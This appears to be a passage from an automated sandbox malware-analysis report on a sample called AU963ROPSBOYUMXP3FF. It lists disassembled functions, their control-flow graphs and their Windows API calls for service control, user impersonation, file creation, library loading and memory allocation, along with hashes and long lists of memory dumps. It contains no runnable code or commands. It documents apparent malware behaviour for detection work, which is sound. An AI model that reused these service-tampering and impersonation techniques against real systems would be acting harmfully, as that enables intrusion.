                                                                                    APIs
                                                                                    • OpenSCManagerW.SECHOST(00000000,00000000,?), ref: 059D0DCD
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.1655783643.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_59d0000_AU963ROPSBOYUMXP3FF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ManagerOpen
                                                                                    • String ID:
                                                                                    • API String ID: 1889721586-0
                                                                                    • Opcode ID: 721b456d3dd647bf4b5f9bb4fe600311827c09ef34916da0b5f3274bdac21cc5
                                                                                    • Instruction ID: 72412019aa77df18af2dc6c6bfdb2c978712d3b72cacd187bb81c8d0f290afdf
                                                                                    • Opcode Fuzzy Hash: 721b456d3dd647bf4b5f9bb4fe600311827c09ef34916da0b5f3274bdac21cc5
                                                                                    • Instruction Fuzzy Hash: CC2114BAC013199FCB50CF99D985BDEFBB5BB88310F15811AD809AB244D734A541CBA4
                                                                                    Function 059D0D48 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 225 59d0d48-59d0d97 227 59d0d9f-59d0da3 225->227 228 59d0d99-59d0d9c 225->228 229 59d0dab-59d0dda OpenSCManagerW 227->229 230 59d0da5-59d0da8 227->230 228->227 231 59d0ddc-59d0de2 229->231 232 59d0de3-59d0df7 229->232 230->229 231->232
                                                                                    APIs
                                                                                    • OpenSCManagerW.SECHOST(00000000,00000000,?), ref: 059D0DCD
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.1655783643.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_59d0000_AU963ROPSBOYUMXP3FF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ManagerOpen
                                                                                    • String ID:
                                                                                    • API String ID: 1889721586-0
                                                                                    • Opcode ID: e0b493992503b6d65ff24099c072b75f5981d13b0045954d2b5be5dbc8ddf9b3
                                                                                    • Instruction ID: 79368c9603b1049b52e6b039437bce414bead840c6b967959cbd7eb2272beea8
                                                                                    • Opcode Fuzzy Hash: e0b493992503b6d65ff24099c072b75f5981d13b0045954d2b5be5dbc8ddf9b3
                                                                                    • Instruction Fuzzy Hash: AF2115B6C013199FCB10CF9AD885BDEFBF4FB88320F15821AD809AB244D734A541CBA4
                                                                                    Function 059D1510 Relevance: 1.6, APIs: 1, Instructions: 54serviceCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 239 59d1510-59d158d ControlService 241 59d158f-59d1595 239->241 242 59d1596-59d15b7 239->242 241->242
                                                                                    APIs
                                                                                    • ControlService.ADVAPI32(?,?,?), ref: 059D1580
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.1655783643.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_59d0000_AU963ROPSBOYUMXP3FF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ControlService
                                                                                    • String ID:
                                                                                    • API String ID: 253159669-0
                                                                                    • Opcode ID: 67576a05a4ee063abe4daf671e555258e14c54b76c62f26ec3dcd5e2c0748565
                                                                                    • Instruction ID: f4dabcf4c5972e82309655c737223922ca471605f79fc6c247e0e55b00811295
                                                                                    • Opcode Fuzzy Hash: 67576a05a4ee063abe4daf671e555258e14c54b76c62f26ec3dcd5e2c0748565
                                                                                    • Instruction Fuzzy Hash: 4911E7B5D003499FDB10CF9AC545BDEFBF4EB48320F108029E559A3250D778A545CFA5
                                                                                    Function 059D1509 Relevance: 1.6, APIs: 1, Instructions: 54serviceCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 234 59d1509-59d1550 235 59d1558-59d158d ControlService 234->235 236 59d158f-59d1595 235->236 237 59d1596-59d15b7 235->237 236->237
                                                                                    APIs
                                                                                    • ControlService.ADVAPI32(?,?,?), ref: 059D1580
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.1655783643.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_59d0000_AU963ROPSBOYUMXP3FF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ControlService
                                                                                    • String ID:
                                                                                    • API String ID: 253159669-0
                                                                                    • Opcode ID: c6867f88176aec9e942c32b150b59b1812a009ba5c1b7cea56abf9b05b6c9b88
                                                                                    • Instruction ID: 71f03d70e5c4b35666caf5fe49eae8b59ccb373f282f393fce0b8202b2c21b23
                                                                                    • Opcode Fuzzy Hash: c6867f88176aec9e942c32b150b59b1812a009ba5c1b7cea56abf9b05b6c9b88
                                                                                    • Instruction Fuzzy Hash: 1E2117B6D003498FDB10CF9AC545BDEFBF4EB48320F10842AE519A7250D338A644CFA5
                                                                                    Function 059D1301 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 244 59d1301-59d1341 246 59d1349-59d1374 ImpersonateLoggedOnUser 244->246 247 59d137d-59d139e 246->247 248 59d1376-59d137c 246->248 248->247
                                                                                    APIs
                                                                                    • ImpersonateLoggedOnUser.KERNELBASE ref: 059D1367
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.1655783643.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_59d0000_AU963ROPSBOYUMXP3FF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ImpersonateLoggedUser
                                                                                    • String ID:
                                                                                    • API String ID: 2216092060-0
                                                                                    • Opcode ID: 0901f3d12f9f5fdbb35ecd97e4a9bd720b45b80c3cc6585370144370c698c3f1
                                                                                    • Instruction ID: df98fe3c2d12b97aa09b1da775481cc9b4f919700c88b8c161f995e3aa13f741
                                                                                    • Opcode Fuzzy Hash: 0901f3d12f9f5fdbb35ecd97e4a9bd720b45b80c3cc6585370144370c698c3f1
                                                                                    • Instruction Fuzzy Hash: F6111676800349CFDB10DF9AD485BDEFBF8EB48320F148429E918A3650D778A544CFA5
                                                                                    Function 059D1308 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 250 59d1308-59d1374 ImpersonateLoggedOnUser 252 59d137d-59d139e 250->252 253 59d1376-59d137c 250->253 253->252
                                                                                    APIs
                                                                                    • ImpersonateLoggedOnUser.KERNELBASE ref: 059D1367
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.1655783643.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_59d0000_AU963ROPSBOYUMXP3FF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ImpersonateLoggedUser
                                                                                    • String ID:
                                                                                    • API String ID: 2216092060-0
                                                                                    • Opcode ID: 8108b49e1cb42cdc8d377e87b4ea807d901206725736fb751b555af780e91ca3
                                                                                    • Instruction ID: e25716efa800b0e30596586567cf8206504efa16744ac464ff3746a25a9d23c5
                                                                                    • Opcode Fuzzy Hash: 8108b49e1cb42cdc8d377e87b4ea807d901206725736fb751b555af780e91ca3
                                                                                    • Instruction Fuzzy Hash: 1811F5B5C003498FDB20DF9AC545BDEFBF8EB48320F14842AD518A3650D778A944CFA5
                                                                                    Function 0118C3D9 Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.1653522526.0000000001186000.00000040.00000001.01000000.00000006.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.1653260775.0000000001000000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653281142.0000000001002000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653304149.0000000001006000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653321615.000000000100A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653341729.0000000001014000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653360423.0000000001015000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653378596.0000000001016000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653484088.0000000001174000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653502149.0000000001176000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653522526.0000000001193000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653564056.00000000011AD000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653580823.00000000011AE000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653597564.00000000011B1000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653614562.00000000011B3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653633462.00000000011BF000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653649910.00000000011C0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653667239.00000000011C6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653687899.00000000011D7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653706465.00000000011E1000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653723587.00000000011E6000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653742528.00000000011F5000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653760213.00000000011FD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653778616.0000000001205000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653795341.0000000001206000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653811810.0000000001207000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653829744.000000000120D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653847422.000000000120E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653864799.0000000001211000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653882974.0000000001219000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653903156.000000000121D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653922680.000000000122A000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653939171.0000000001230000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653954090.0000000001231000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653973799.0000000001235000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653991338.000000000123D000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654007031.000000000123F000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654025770.000000000124E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654042580.0000000001250000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654064316.000000000126D000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654081875.000000000126F000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654105312.000000000128F000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654120760.0000000001290000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654137220.0000000001299000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654137220.00000000012A2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654172991.00000000012B0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_1000000_AU963ROPSBOYUMXP3FF.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: 7fbc9f81683a0dde2751f9621d0859610e729d16a6229eb5ac0144035ab761f0
                                                                                    • Instruction ID: 618457ddec52e7bdb0259dbfbde40c00415db9cf493dadb2cdb5f6ac34e4157d
                                                                                    • Opcode Fuzzy Hash: 7fbc9f81683a0dde2751f9621d0859610e729d16a6229eb5ac0144035ab761f0
                                                                                    • Instruction Fuzzy Hash: A8D022A10EC1C118F2143AB90C803BF3809CB13968F220C2CE1E5C24CAC5A1C50A0602
                                                                                    Function 0118C3C6 Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.1653522526.0000000001186000.00000040.00000001.01000000.00000006.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.1653260775.0000000001000000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653281142.0000000001002000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653304149.0000000001006000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653321615.000000000100A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653341729.0000000001014000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653360423.0000000001015000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653378596.0000000001016000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653484088.0000000001174000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653502149.0000000001176000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653522526.0000000001193000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653564056.00000000011AD000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653580823.00000000011AE000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653597564.00000000011B1000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653614562.00000000011B3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653633462.00000000011BF000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653649910.00000000011C0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653667239.00000000011C6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653687899.00000000011D7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653706465.00000000011E1000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653723587.00000000011E6000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653742528.00000000011F5000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653760213.00000000011FD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653778616.0000000001205000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653795341.0000000001206000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653811810.0000000001207000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653829744.000000000120D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653847422.000000000120E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653864799.0000000001211000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653882974.0000000001219000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653903156.000000000121D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653922680.000000000122A000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653939171.0000000001230000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653954090.0000000001231000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653973799.0000000001235000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653991338.000000000123D000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654007031.000000000123F000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654025770.000000000124E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654042580.0000000001250000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654064316.000000000126D000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654081875.000000000126F000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654105312.000000000128F000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654120760.0000000001290000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654137220.0000000001299000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654137220.00000000012A2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654172991.00000000012B0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_1000000_AU963ROPSBOYUMXP3FF.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: 48acbf20bec871cb9dc11810ed9738644c8f952ce009721194cb13f95c6c2387
                                                                                    • Instruction ID: 60dd3a876db1607cdc09b4ec7a27c32a7bfbae8cf8b8493c4efd1b446598b3d4
                                                                                    • Opcode Fuzzy Hash: 48acbf20bec871cb9dc11810ed9738644c8f952ce009721194cb13f95c6c2387
                                                                                    • Instruction Fuzzy Hash: E7D0A79549C65239D2187A7D4CC07FDF5995F96901F51441EAC84C7941C2A11A454A93
                                                                                    Function 01197064 Relevance: 1.5, APIs: 1, Instructions: 3libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.1653522526.0000000001193000.00000040.00000001.01000000.00000006.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.1653260775.0000000001000000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653281142.0000000001002000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653304149.0000000001006000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653321615.000000000100A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653341729.0000000001014000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653360423.0000000001015000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653378596.0000000001016000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653484088.0000000001174000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653502149.0000000001176000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653522526.0000000001186000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653564056.00000000011AD000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653580823.00000000011AE000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653597564.00000000011B1000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653614562.00000000011B3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653633462.00000000011BF000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653649910.00000000011C0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653667239.00000000011C6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653687899.00000000011D7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653706465.00000000011E1000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653723587.00000000011E6000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653742528.00000000011F5000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653760213.00000000011FD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653778616.0000000001205000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653795341.0000000001206000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653811810.0000000001207000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653829744.000000000120D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653847422.000000000120E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653864799.0000000001211000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653882974.0000000001219000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653903156.000000000121D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653922680.000000000122A000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653939171.0000000001230000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653954090.0000000001231000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653973799.0000000001235000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653991338.000000000123D000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654007031.000000000123F000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654025770.000000000124E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654042580.0000000001250000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654064316.000000000126D000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654081875.000000000126F000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654105312.000000000128F000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654120760.0000000001290000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654137220.0000000001299000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654137220.00000000012A2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654172991.00000000012B0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_1000000_AU963ROPSBOYUMXP3FF.jbxd
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad
                                                                                    • String ID:
                                                                                    • API String ID: 1029625771-0
                                                                                    • Opcode ID: 70274a7d44b6d6476f6c68da3928d4b3045b0637dfb6306c0f83d540aaa61ef8
                                                                                    • Instruction ID: fe40dc2b3cd04811d7b6d99e9971641fc6014ee54e9858bf7f630e57e6ddb677
                                                                                    • Opcode Fuzzy Hash: 70274a7d44b6d6476f6c68da3928d4b3045b0637dfb6306c0f83d540aaa61ef8
                                                                                    • Instruction Fuzzy Hash: 5990027140800ADE4F084D74441885E3534A5596017A14005751280C40569508108626
                                                                                    Function 0100E7B0 Relevance: 1.3, APIs: 1, Instructions: 43memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNELBASE(00000000), ref: 0100ED9D
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.1653321615.000000000100A000.00000040.00000001.01000000.00000006.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.1653260775.0000000001000000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653281142.0000000001002000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653304149.0000000001006000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653341729.0000000001014000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653360423.0000000001015000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653378596.0000000001016000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653484088.0000000001174000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653502149.0000000001176000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653522526.0000000001186000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653522526.0000000001193000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653564056.00000000011AD000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653580823.00000000011AE000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653597564.00000000011B1000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653614562.00000000011B3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653633462.00000000011BF000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653649910.00000000011C0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653667239.00000000011C6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653687899.00000000011D7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653706465.00000000011E1000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653723587.00000000011E6000.00000040.00000001.01000000.00000006.sdmpDownload File
